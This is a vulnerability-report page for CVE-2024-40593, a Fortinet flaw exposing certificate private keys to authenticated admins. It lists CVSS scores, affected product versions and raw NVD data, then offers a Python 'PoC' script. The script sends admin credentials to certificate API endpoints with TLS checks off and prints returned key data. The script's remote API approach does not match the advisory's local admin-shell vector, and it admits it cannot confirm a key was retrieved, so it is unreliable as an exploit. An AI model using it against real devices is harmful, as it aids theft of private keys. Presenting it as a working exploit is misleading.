Security Vulnerability Report
CVE-2024-40593 CVSS 6.0 MEDIUM

CVE-2024-40593

Published: 2025-12-11 15:15:46
Last Modified: 2025-12-12 18:28:55

Description

A key management errors vulnerability in Fortinet FortiAnalyzer 7.4.0 through 7.4.2, FortiAnalyzer 7.2.0 through 7.2.5, FortiAnalyzer 7.0 all versions, FortiAnalyzer 6.4 all versions, FortiManager 7.4.0 through 7.4.2, FortiManager 7.2.0 through 7.2.5, FortiManager 7.0 all versions, FortiManager 6.4 all versions, FortiOS 7.6.0, FortiOS 7.4.4, FortiOS 7.2.7, FortiOS 7.0.14, FortiPortal 6.0 all versions may allow an authenticated admin to retrieve a certificate's private key via the device's admin shell.

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
Source: secondary (vendor) assessment. The NVD primary assessment in the raw JSON record scores the same issue 4.4 MEDIUM with vector CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N; the only difference is Scope (Changed vs. Unchanged).

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* (6.4.0 up to, but excluding, 7.2.6) - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* (7.4.0 up to, but excluding, 7.4.3) - VULNERABLE
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* (6.4.0 up to, but excluding, 7.2.6) - VULNERABLE
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* (7.4.0 up to, but excluding, 7.4.3) - VULNERABLE
cpe:2.3:o:fortinet:fortios:7.0.14:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:7.2.7:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:7.4.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:7.6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:* (6.0.0 through 6.0.15, inclusive) - VULNERABLE

Affected versions as listed in the advisory text:
FortiAnalyzer 7.4.0 - 7.4.2
FortiAnalyzer 7.2.0 - 7.2.5
FortiAnalyzer 7.0 all versions
FortiAnalyzer 6.4 all versions
FortiManager 7.4.0 - 7.4.2
FortiManager 7.2.0 - 7.2.5
FortiManager 7.0 all versions
FortiManager 6.4 all versions
FortiOS 7.6.0
FortiOS 7.4.4
FortiOS 7.2.7
FortiOS 7.0.14
FortiPortal 6.0 all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-40593 PoC - Certificate Private Key Retrieval
# Note: This PoC is for educational purposes only
import requests
import argparse
from requests.auth import HTTPBasicAuth


def exploit_cve_2024_40593(target_url, username, password):
    """
    Exploit for CVE-2024-40593: Key Management Error in Fortinet Products
    Allows authenticated admin to retrieve certificate's private key
    """
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Authenticating as: {username}")

    # Authentication
    session = requests.Session()
    auth = HTTPBasicAuth(username, password)

    # Attempt to retrieve certificate private key via admin shell
    # This requires CLI access through the web interface or API

    # Method 1: Via CLI command (listed for reference only; this script never executes it)
    cli_cmd = "execute certificate local list"

    # Method 2: Direct API access to certificate endpoint
    cert_endpoint = f"{target_url}/api/v2/monitor/system/certificate/local"

    try:
        # Check if we can access certificate information
        response = session.get(cert_endpoint, auth=auth, verify=False, timeout=30)
        if response.status_code == 200:
            cert_data = response.json()
            print("[+] Successfully retrieved certificate information")

            # Attempt to retrieve private key
            private_key_cmd = f"{target_url}/api/v2/monitor/system/certificate/local/detail"
            pk_response = session.get(private_key_cmd, auth=auth, verify=False, timeout=30)
            # Caveat: an HTTP 200 here only shows the endpoint answered; the script
            # does not inspect the body, so it cannot by itself confirm a key was returned.
            if pk_response.status_code == 200:
                print("[+] VULNERABLE: Private key accessible!")
                print(f"[+] Private Key Data: {pk_response.text[:500]}")
                return True
        elif response.status_code == 401:
            print("[-] Authentication failed")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
    return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2024-40593 PoC")
    parser.add_argument("-t", "--target", required=True, help="Target URL")
    parser.add_argument("-u", "--username", required=True, help="Admin username")
    parser.add_argument("-p", "--password", required=True, help="Admin password")
    args = parser.parse_args()
    exploit_cve_2024_40593(args.target, args.username, args.password)

References

https://fortiguard.fortinet.com/psirt/FG-IR-24-133 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-40593", "sourceIdentifier": "[email protected]", "published": "2025-12-11T15:15:46.243", "lastModified": "2025-12-12T18:28:55.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A key management errors vulnerability in Fortinet FortiAnalyzer 7.4.0 through 7.4.2, FortiAnalyzer 7.2.0 through 7.2.5, FortiAnalyzer 7.0 all versions, FortiAnalyzer 6.4 all versions, FortiManager 7.4.0 through 7.4.2, FortiManager 7.2.0 through 7.2.5, FortiManager 7.0 all versions, FortiManager 6.4 all versions, FortiOS 7.6.0, FortiOS 7.4.4, FortiOS 7.2.7, FortiOS 7.0.14, FortiPortal 6.0 all versions may allow an authenticated admin to retrieve a certificate's private key via the device's admin shell."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-320"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": 
false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.2.6", "matchCriteriaId": "F07BE2AB-5F28-4773-B9C3-1D76EA1C2D06"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.3", "matchCriteriaId": "AF309EFD-1770-44AF-B192-3D9816F792CB"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.2.6", "matchCriteriaId": "71CC4AA3-04CC-49CA-A012-E28C4D1F11DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.3", "matchCriteriaId": "E4490512-36ED-4212-9D34-D74739A56E84"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:7.0.14:*:*:*:*:*:*:*", "matchCriteriaId": "71294A46-2667-4213-BA04-542291BC5D58"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:7.2.7:*:*:*:*:*:*:*", "matchCriteriaId": "AA6A7535-6EDF-4792-8AC4-ADFF40811E08"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:7.4.4:*:*:*:*:*:*:*", "matchCriteriaId": "3B543474-445F-431D-A06A-63F566798BCF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:7.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "44CE8EE3-D64A-49C8-87D7-C18B302F864A"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.15", "matchCriteriaId": "A52BD29D-7295-48A1-9B89-86517C9AA5AE"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-133", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}